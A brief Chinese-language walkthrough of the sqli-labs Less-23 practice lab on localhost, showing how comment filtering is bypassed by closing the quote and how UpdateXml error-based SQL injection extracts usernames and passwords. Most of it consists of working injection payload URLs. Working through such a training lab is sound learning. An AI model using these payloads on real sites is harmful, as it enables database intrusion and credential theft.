、
加单引号报错
加#
http://localhost/sqli-labs-master/Less-23/?id=1‘%23
错误没有改变,推测过滤了#
查看源码发现# -- 都被替换掉了
那么可用通过闭合单引号的方式
http://localhost/sqli-labs-master/Less-23/?id=1‘ and ‘1‘=‘1
然后通过UpdateXml函数利用报错取数据
http://localhost/sqli-labs-master/Less-23/?id=1‘ and UpdateXml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1)=‘1
http://localhost/sqli-labs-master/Less-23/?id=1‘ and UpdateXml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)=‘1